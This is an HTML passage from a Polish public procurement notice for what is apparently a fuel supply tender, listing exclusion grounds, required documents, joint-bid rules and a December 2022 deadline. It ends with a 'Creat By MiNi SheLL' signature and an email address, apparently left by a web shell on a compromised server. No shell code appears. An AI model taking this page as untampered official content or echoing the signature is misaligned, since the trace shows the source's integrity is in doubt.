<br/>do wykluczenia, w zakresie podstaw wykluczenia z postępowania wskazanych przez <br/>Zamawiającego, o których mowa w: <br/>- art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>- art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego, <br/>- art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami <br/>porozumienia mającego na celu zakłócenie konkurencji, <br/>- art. 108 ust. 1 pkt 6 ustawy Pzp. <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej <br/>Polskiej, zamiast informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione <br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, <br/>że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza <br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest <br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej <br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>Dokumenty potwierdzające ww. okoliczności powinny być wystawione nie wcześniej <br/>niż 3 miesiące przed ich złożeniem. <br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się <br/>w/w dokumentów, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, <br/>o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy <br/>Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym <br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych <br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod <br/>przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania <br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub <br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, <br/>właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. <br/>Dokumenty potwierdzające ww. okoliczności powinny być wystawione nie wcześniej <br/>niż 3 miesiące przed ich złożeniem. <br/>2) potwierdzających spełnianie warunków udziału w postępowaniu dotyczących uprawnień <br/>do prowadzenia określonej działalności gospodarczej lub zawodowej: koncesję na obrót <br/>paliwami ciekłym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia w zakresie wskazanym w SWZ składane pod rygorem nieważności <br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym, <br/>3) Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki: <br/>a) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne; <br/>b) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem <br/>lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, <br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami <br/>ścigania, lub zamawiającym; <br/>c) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla <br/>zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu <br/>postępowaniu, w szczególności: <br/>- zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi <br/>za nieprawidłowe postępowanie wykonawcy, <br/>- zreorganizował personel, <br/>- wdrożył system sprawozdawczości i kontroli, <br/>- utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, <br/>wewnętrznych regulacji lub standardów, <br/>- wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań <br/>za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów. <br/>Zamawiający oceni, czy podjęte przez wykonawcę czynności są wystarczające <br/>do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu <br/>wykonawcy, a jeżeli uzna, że nie są wystarczające, wykluczy wykonawcę. <br/>4) Pełnomocnictwo: <br/>a) gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, <br/>Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć <br/>do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie <br/>do złożenia oferty lub do złożenia oferty i podpisania umowy, <br/>b) w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia <br/>Wykonawcy są zobowiązani do ustanowienia pełnomocnika. Dokument <br/>pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania <br/>w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć <br/>do oferty. <br/>Pełnomocnictwo należy załączyć do oferty i powinno zawierać w szczególności wskazanie: <br/>- postępowania o zamówienie publiczne, którego dotyczy, <br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia <br/>wymienionych z nazwy z określeniem adresu siedziby, <br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania. <br/>5) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko <br/>jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni Wykonawcy, <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać <br/>na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, <br/>do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy <br/>są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty <br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <br/>6) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych <br/>zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca, w celu spełnienia <br/>warunków, będzie polegał na zdolnościach technicznych lub zawodowych innych <br/>podmiotów.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca dołącza do oferty: <br/>1) Formularz oferty,<br/>2) oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia w zakresie wskazanym w SWZ składane pod rygorem nieważności <br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub <br/>podpisem osobistym, <br/>3) Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki<br/>4) Pełnomocnictwo<br/>5) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko <br/>jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają <br/>poszczególni Wykonawcy, <br/>6) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych <br/>zasobów na potrzeby realizacji zamówienia w przypadku gdy Wykonawca, w celu spełnienia <br/>warunków, będzie polegał na zdolnościach technicznych lub zawodowych innych <br/>podmiotów. <br/>7) Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty <br/>składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca, wraz <br/>z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane oraz <br/>wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu <br/>przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku: <br/>- Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika <br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu <br/>i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego, <br/>- wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <br/><br/>5) Potencjał podmiotu trzeciego: W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca może polegać na potencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot trzeci, na potencjał którego Wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1. <br/>6) Podwykonawstwo Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań. Wykonawca może powierzyć wykonanie części zamówienia <br/>podwykonawcy. Wykonawca jest zobowiązany wskazać w formularzu ofertowym, części <br/>zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podać firmy <br/>podwykonawców, o ile są już znane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załączonym projektem umowy:<br/>8. Zamawiający dopuszcza możliwość zmiany ceny, przy zmianach cen na rynku,<br/>z zachowaniem oferowanej marży, po wykazaniu przez Wykonawcę tych zmian.<br/>9. Strony dopuszczają możliwość zmian cen jednostkowych wymienionych w ust.1 § 5<br/>załączonej umowy w sytuacji zmian cen przez producenta bez aneksowania niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com